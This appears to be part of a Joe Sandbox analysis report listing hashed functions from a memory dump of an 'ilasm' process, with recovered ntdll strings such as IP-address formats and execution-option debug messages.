Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680fd9c1c3655da4d30abe1b73bf194b824375b0d5df7155b3a31a79f7085f04
Instruction ID: 02fca0d8991d6b8623ce1f05b63899fe46da0cdbf433274b769b58f12721aee9
Opcode Fuzzy Hash: 680fd9c1c3655da4d30abe1b73bf194b824375b0d5df7155b3a31a79f7085f04
Instruction Fuzzy Hash: C390026230181043D140715854586064015D7E1701F95E411E0414598CD91589565222

Function 05BF2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70b01ff8eb3890cd3ea38c0fc7c17d115dd40becf783a068b69af044dc0cd7e
Instruction ID: bbba40e0e0c2e163671862504d58f4041317903db754b9202fc16c91c304ed25
Opcode Fuzzy Hash: c70b01ff8eb3890cd3ea38c0fc7c17d115dd40becf783a068b69af044dc0cd7e
Instruction Fuzzy Hash: 7090026A21381042D1807158544860A001587D1602FD5E815A001559CCC91589695321

Function 05BF2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c055628330474d047f1b3e63ae690b3febcaa658bc552b0b7b358646b1667b8a
Instruction ID: 3d50afac5de34eac4ebd5d76049e8ea4aae66d17cf15f8156118f230fae921a2
Opcode Fuzzy Hash: c055628330474d047f1b3e63ae690b3febcaa658bc552b0b7b358646b1667b8a
Instruction Fuzzy Hash: 0090026220585482D10075585448A06001587D0605F95E411A10645D9DC6358951A131

Function 05BF2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0decc8d5720db4a8aff3c94c8aeb8a5bf90ba6262e37ac8228646715113b08
Instruction ID: 1a57944d24c66e894e541b27e989e66ca450c0b06cc9a4dbdff066007593e4fb
Opcode Fuzzy Hash: 1a0decc8d5720db4a8aff3c94c8aeb8a5bf90ba6262e37ac8228646715113b08
Instruction Fuzzy Hash: A790027220181442D10075985448646001587E0701F95E411A5024599EC66589916131

Function 05BF2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd47614172e958dfaefaa0945778a6b662c3c51575ffb723b01640103f57f79d
Instruction ID: e9dc5415a9c08b65913f372b5e44dd8c2cb1240086032128a74b354acc4f7602
Opcode Fuzzy Hash: fd47614172e958dfaefaa0945778a6b662c3c51575ffb723b01640103f57f79d
Instruction Fuzzy Hash: F890027220181443D10071585548707001587D0601F95E811A042459CDD65689516121

Function 05BF2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d466c5786f9026917897fb6112a33e7b7fb821655ccb308f4c00c515c7b6e3e
Instruction ID: 8d6c298ca78247d81ca6a5ab119479f5c55f216cb44860381346e7a82319d5d3
Opcode Fuzzy Hash: 1d466c5786f9026917897fb6112a33e7b7fb821655ccb308f4c00c515c7b6e3e
Instruction Fuzzy Hash: 4890026260581442D14071585458706002587D0601F95E411A0024598DC6598B5566A1

Function 05BF2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcae67cb8326cc825614f9a8cc20a7d8d4d4eab0dd5c6f4c00973b04c23c5f51
Instruction ID: 95ce6138083d8150df2493dc914ad118c4d5822e0e045d79cc86c3ffdc0c6874
Opcode Fuzzy Hash: bcae67cb8326cc825614f9a8cc20a7d8d4d4eab0dd5c6f4c00973b04c23c5f51
Instruction Fuzzy Hash: C690027220181882D10071584444B46001587E0701F95D416A0124698D8615C9517521

Function 05BF2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a170d98d63457f8621523d37afafbad37759f7b962c0b9d77d890c4263ff299
Instruction ID: 81fac748c8605bde16ac35f58da4b7a6123793d001eef767666e7162cbd686c3
Opcode Fuzzy Hash: 9a170d98d63457f8621523d37afafbad37759f7b962c0b9d77d890c4263ff299
Instruction Fuzzy Hash: 12900262601810824140716888849064015ABE1611B95D521A0998594D855989655665

Function 05BF2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e5e6497dd22e399cfb4ea3d32b191080245c831ad698257ac908121ace68b8
Instruction ID: 8c2a7ca48157cefa0a557a294d29630f366ab5e0fbf78f87ec6cb3edd9b05393
Opcode Fuzzy Hash: 88e5e6497dd22e399cfb4ea3d32b191080245c831ad698257ac908121ace68b8
Instruction Fuzzy Hash: 39900272201C1442D10071584848747001587D0702F95D411A5164599E8665C9916531

Function 05BF2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9e7238dd297f91add763f9acdab8d31a53f7e99c10589ed6c451a443f46cdb
Instruction ID: d71ec61ff5a9e282da9686e42ab3013314bddcb12ae1183ce19aa22f736e9921
Opcode Fuzzy Hash: cc9e7238dd297f91add763f9acdab8d31a53f7e99c10589ed6c451a443f46cdb
Instruction Fuzzy Hash: E8900272201C1442D1007158485470B001587D0702F95D411A1164599D862589516571

Function 05BF2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a09428c0e46f43da26db21d32f599949040e4a31bdb8beda9c92d89e5e6918
Instruction ID: 44b4459d5c4fea2dbe28fbaf5471d3accfd97a661fa852d1c321d2d6c976b431
Opcode Fuzzy Hash: 60a09428c0e46f43da26db21d32f599949040e4a31bdb8beda9c92d89e5e6918
Instruction Fuzzy Hash: 24900262211C1082D20075684C54B07001587D0703F95D515A0154598CC91589615521

Function 05BF2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7036c9ce71385d53593bd662a5f40a4dbdb37d275d27851cf693dd477377be1
Instruction ID: 20eb68ea30fd76217b931353362aefd053fa1411fee911cada63d0ea10998ad5
Opcode Fuzzy Hash: d7036c9ce71385d53593bd662a5f40a4dbdb37d275d27851cf693dd477377be1
Instruction Fuzzy Hash: 639002A234181482D10071584454B060015C7E1701F95D415E1064598D8619CD526126

Function 05BF2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7ced7e5993e61c25189526c5ef3d305ab471f4679627118d14907f0c6de53a
Instruction ID: b8c122bebfcd602bccc5f1c7f13da1dfc527b37667b013aef8fd0b591d3579a7
Opcode Fuzzy Hash: cd7ced7e5993e61c25189526c5ef3d305ab471f4679627118d14907f0c6de53a
Instruction Fuzzy Hash: 4C9002A221181082D10471584444706005587E1601F95D412A2154598CC5298D615125

Function 05BF2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b21a0b397342088af08317841d966186b04ccb3627276cc45152cf43ef8487
Instruction ID: 72440903538455109739cb064bb48c8a35a961e1f1d28db6ff925eed5aa545f2
Opcode Fuzzy Hash: e7b21a0b397342088af08317841d966186b04ccb3627276cc45152cf43ef8487
Instruction Fuzzy Hash: C59002B220181442D14071584444746001587D0701F95D411A5064598E86598ED56665

Function 05BF2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80171049db55a3db24a039eb97688ad109d4a2c424f1f4432a4b8bc9bf0c7210
Instruction ID: cbf4205d4d221ab9cf9c7d9b45d6cc3fbab446628a98dc234c87fe34a557a224
Opcode Fuzzy Hash: 80171049db55a3db24a039eb97688ad109d4a2c424f1f4432a4b8bc9bf0c7210
Instruction Fuzzy Hash: 9190026260181542D10171584444616001A87D0641FD5D422A1024599ECA258A92A131

Function 05BF2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f08b6d2549ed984c36d493065fc053de4b34d7a2e65f35104521ed6cd5948e0
Instruction ID: 8d492f3df1cca08bef94bcbb1a95f2b99972f4a634ad92b3bebc698f2ce0cb56
Opcode Fuzzy Hash: 0f08b6d2549ed984c36d493065fc053de4b34d7a2e65f35104521ed6cd5948e0
Instruction Fuzzy Hash: F89002A2201C1443D14075584844607001587D0702F95D411A2064599E8A298D516135

Function 05BF2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb80d5d7e36620e45f7a4841c6be9804222e3103f373aa64a9300c3bdd0df17
Instruction ID: f9213b058df38389cd3063e19e5c47097ef248d4ec46396f4864e204bef4cd86
Opcode Fuzzy Hash: 9eb80d5d7e36620e45f7a4841c6be9804222e3103f373aa64a9300c3bdd0df17
Instruction Fuzzy Hash: 1490026230181442D102715844546060019C7D1745FD5D412E1424599D86258A53A132

Function 05BF2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367efacc510592adda1377798a69d32c38d58ea45d6f246c688c7d75acdbee2b
Instruction ID: 9a6c5c3b1de7cd966b99ed128c4836e1f6557e562ef27b5c854193980e1e0498
Opcode Fuzzy Hash: 367efacc510592adda1377798a69d32c38d58ea45d6f246c688c7d75acdbee2b
Instruction Fuzzy Hash: 8690027260581842D15071584454746001587D0701F95D411A0024698D87558B5576A1

Function 05BF2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c2f070a422206bc170011ce1090e5586711e65bc3af944362c8a5b5e6c534d
Instruction ID: 8cd7fedf589459e4c7fd4da82bca8938b87faeabb10c3960eb0cd4d4b145bdeb
Opcode Fuzzy Hash: c2c2f070a422206bc170011ce1090e5586711e65bc3af944362c8a5b5e6c534d
Instruction Fuzzy Hash: 8290027220181842D10471584844686001587D0701F95D411A6024699E966589917131

Function 05BF2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8c7dde7e9eea87957279a79d92d068082251afd0a7187cb127523b52016631
Instruction ID: aa81187c2fbaf5ec2a4bab8d4261b88e7dc5bc5b2c27d341ecb50244c0cf97a4
Opcode Fuzzy Hash: 0a8c7dde7e9eea87957279a79d92d068082251afd0a7187cb127523b52016631
Instruction Fuzzy Hash: F690027220181842D1807158444464A001587D1701FD5D415A0025698DCA158B5977A1

Function 05BF2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91504632c34715203e8f4fbd6d6dd83da5419b7555e2c964b87601c9d991dac
Instruction ID: b34934d8482bbf91e649602a4bdf221f92b988c85b574d2e8f742c38b7c4bc60
Opcode Fuzzy Hash: d91504632c34715203e8f4fbd6d6dd83da5419b7555e2c964b87601c9d991dac
Instruction Fuzzy Hash: AE90027220585882D14071584444A46002587D0705F95D411A00646D8D96258E55B661

Function 05BF2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d938fc264835d1ee597f0e9c003a8c9c79ade3085ee796f1fad3094b58d1c6b
Instruction ID: 3c3f991b63977f074e4386d815034587be103859dfe7272bd80150e5a3226307
Opcode Fuzzy Hash: 5d938fc264835d1ee597f0e9c003a8c9c79ade3085ee796f1fad3094b58d1c6b
Instruction Fuzzy Hash: 409002E2201950D24500B2588444B0A451587E0601F95D416E10545A4CC52589519135

Function 05BF2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41adae1e2dfddeaa2e97e60bba018127cb9c136ecb0d5b01c0d67a4097f368e1
Instruction ID: e805c61b4917a5ac5cd85d07b7c8603033f0985972104d8b8309efc7c042b247
Opcode Fuzzy Hash: 41adae1e2dfddeaa2e97e60bba018127cb9c136ecb0d5b01c0d67a4097f368e1
Instruction Fuzzy Hash: D1900266221810420145B558064450B045597D67517D5D415F14165D4CC62189655321

Function 05BF2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e5d930b77eba25e515d9abe9d7b4e4b6dff6360a657829c56fae66ff96bdbe
Instruction ID: 89e7ef906b0bbb00c1d567f8c9e6c29261bc647ae37d5d195fd7c9735017ef24
Opcode Fuzzy Hash: f4e5d930b77eba25e515d9abe9d7b4e4b6dff6360a657829c56fae66ff96bdbe
Instruction Fuzzy Hash: B6900477311C10430105F55C07445070057C7D57517D5D431F10155D4CD731CD715131

Function 05BF3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c869df8dc3a77e80f02fa82185341a62cd30d9ad29cc795dd3e47ad70fc1f84
Instruction ID: 643f12018fa54dd03b13ea0fd36ee9996403d4bf33771345ceb18edbb803d9cd
Opcode Fuzzy Hash: 6c869df8dc3a77e80f02fa82185341a62cd30d9ad29cc795dd3e47ad70fc1f84
Instruction Fuzzy Hash: B090026224181842D140715884547070016C7D0A01F95D411A0024598D86168A6566B1

Function 05BF3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9b6cc7e9b50621a24b74b882c87a93be0e4f45787f6dc56cf659dc6cb7dbcf
Instruction ID: 33ad79660d9b9f39d9cf3fd3a440da8d9c15ff47fe0d40b8fd25645c1db47976
Opcode Fuzzy Hash: 4d9b6cc7e9b50621a24b74b882c87a93be0e4f45787f6dc56cf659dc6cb7dbcf
Instruction Fuzzy Hash: 4F900262201C5482D14072584844B0F411587E1602FD5D419A4156598CC91589555721

Function 05BF3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dafeb3c0ba08d2e2bc4d76307aef9e7edd94e162e6abc5d922cde5254b3c39ca
Instruction ID: 3409ce6c71cc0f248a603aaa0dbffe32fb4ba0f08cabdad55568f0585ff6248e
Opcode Fuzzy Hash: dafeb3c0ba08d2e2bc4d76307aef9e7edd94e162e6abc5d922cde5254b3c39ca
Instruction Fuzzy Hash: 9690027220281182954072585844A4E411587E1702FD5E815A0015598CC91489615221

Function 05BF3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b34b2c14dfdd472f61ab72dc03ec59bb64c9ba8f89ddf6982d80ad129753194
Instruction ID: 0bf87a139b79f32166d1d0ac001d2f3ff66fcb9a27cc0d3257d0f2d1ae34018b
Opcode Fuzzy Hash: 2b34b2c14dfdd472f61ab72dc03ec59bb64c9ba8f89ddf6982d80ad129753194
Instruction Fuzzy Hash: 6190027620181442D51071585844646005687D0701F95E811A042459CD865489A1A121

Function 05BF39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5efb7c4f6c3332ee70946f19ba2e5dcb5b5bb05cfa0009394541e9ef0cec682f
Instruction ID: 418e3a454a38ad49609768223319d741a4d0e5da0dc2c2069f6df5e9e14c5ecb
Opcode Fuzzy Hash: 5efb7c4f6c3332ee70946f19ba2e5dcb5b5bb05cfa0009394541e9ef0cec682f
Instruction Fuzzy Hash: FB90026224586142D150715C44446164015A7E0601F95D421A08145D8D855589556221

Function 05BF2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 7bec2d5dc9a33900beb27667971434ff9c072edd383cdc5ec0ecb151e8866d67
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 05BF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05BF293C
___swprintf_l.LIBCMT ref: 05BF295E
___swprintf_l.LIBCMT ref: 05BF29A3
___swprintf_l.LIBCMT ref: 05C2A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 05C2A54E
::%hs%u.%u.%u.%u, xrefs: 05C2A527
:%u.%u.%u.%u, xrefs: 05C2A5B8
ffff:, xrefs: 05C2A504

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 052956aa55f17177449890edc6c932ff9916a6fc2404b65f2c8db4d43110739c
Instruction ID: 5f0611e2aeae98f86a76c2f23afd9e6289bc2ffcd9fc277a46d4420c2655b4f1
Opcode Fuzzy Hash: 052956aa55f17177449890edc6c932ff9916a6fc2404b65f2c8db4d43110739c
Instruction Fuzzy Hash: 4351F5BAA04556BFCB20DBA88C8097FF7B9FF08200790C5A9E565D7641E374EE44C7A0

Function 05C62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 05C624A6
___swprintf_l.LIBCMT ref: 05C624E2
___swprintf_l.LIBCMT ref: 05C6257D
___swprintf_l.LIBCMT ref: 05C625A3
___swprintf_l.LIBCMT ref: 05C625C8
___swprintf_l.LIBCMT ref: 05C62608

Strings

::%hs%u.%u.%u.%u, xrefs: 05C6249E
:%u.%u.%u.%u, xrefs: 05C625FF
ffff:, xrefs: 05C6247D, 05C6249D
::ffff:0:%u.%u.%u.%u, xrefs: 05C624DA

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b1ee60666adba52ce90e5fcba6d096717ccdb7af2d44731d559d834818a53c5b
Instruction ID: 4d9d14c4733cabe81e4e5948e26dbc698c8e090afd3314a65ec160a1da88bb21
Opcode Fuzzy Hash: b1ee60666adba52ce90e5fcba6d096717ccdb7af2d44731d559d834818a53c5b
Instruction Fuzzy Hash: 2151B379A04645AECB30DE9DC8D09BEBBFAEF44200B448C5AE4D6D7681E674EB409760

Function 05BE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 05C24787
ExecuteOptions, xrefs: 05C246A0
Execute=1, xrefs: 05C24713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05C24742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05C246FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05C24655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05C24725

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: abb6501fdc3aaec997b916e8286d2c18d351a706e7ea492e135c84de0db5b90f
Instruction ID: 64b797f1c7a43de6b71c60afab61d5cc7b6e72ede208f3ac495999fc57add704
Opcode Fuzzy Hash: abb6501fdc3aaec997b916e8286d2c18d351a706e7ea492e135c84de0db5b90f
Instruction Fuzzy Hash: 3051F631A00259BADF14EAA49C8AFAA77B9FF05704F0804E9E506AB190DF71BA45DF50

Function 05BFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05BFB6BF

Strings

+, xrefs: 05BFB65A
-, xrefs: 05BFB650
0, xrefs: 05BFB695
0, xrefs: 05BFB66F

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 9d262e19b444f2c035d4af4593a8d1cf28144307068bba4cc07662dc6b8d112b
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: F9819570E492499EDF24CF68C851BFEBBB2FF45350F184199DA91A7291C734B848CB51

Function 05BDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 05C202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 05C202BD
RTL: Re-Waiting, xrefs: 05C2031E

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 533d8768f2593b47520a4ab0fbd6d4d19a87c851c3ee4bd2ef1565d7e49e9658
